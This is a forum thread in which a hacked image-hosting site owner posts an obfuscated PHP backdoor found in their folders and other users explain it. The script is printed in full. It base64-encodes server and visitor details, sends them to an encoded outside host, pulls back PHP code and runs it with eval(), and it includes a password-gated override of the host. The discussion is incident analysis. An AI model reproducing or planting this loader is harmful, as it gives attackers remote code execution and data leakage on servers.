Latest Announcemnent
New thread

what hacker do with this php script

Status
Not open for further replies.
C

Cheetah

Active Member
1,387
2008
121
0
My image hosting site got hacked. the hacker placed .htaccess files and some php files with random name. he insterted the files in all most every image folder. so i would like to know what is the output of the php script

Code: 
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="72951d9f890543cc69aa7aa29a5b0609") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

upon execution of the php file, i am getting only blank page. I think he is getting info about my site. some pls explain me
 
16 comments
Seen this before.
Isn't a shell, it's a piece of ad code which shows a malicious virus-infected ad.
 
i tried opening those files in firefox . I mean files on the server. but only getting blank page. I am not going to take risk , deleting all those files
 
I guess you last 3 posters didnt bother reading my post then?
lol

unless that is, you mean "how did it get there". In that case, probably someone with access via an RFU exploit.
 
Hi mate this part of the code

Code: 
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER

Is basically showing

your host name , servername, requested url,referrrer , user agent, the filename stuff like that it can be harmful depending on what it is beign used for

its encodeing the text in base64 encrypted using functions decalred by the alaphabet characters of A-I

what it does is sends ppl to a false php page and redirects them to another one

this attack is being used on TONS of websites

as welll as this same script is being used in the public

http://pastebin.com/m6649b7c3


also read this

http://wordpress.org/support/topic/220523
 
I reversed this script for demon some time back.

What it does:
- Send some site info to website X
- Retrieve php code from website X
- eval() (execute) the retrieved php code

Edit: so basically this can be used as a remote virus or automated shell
 
Status
Not open for further replies.
Back
Top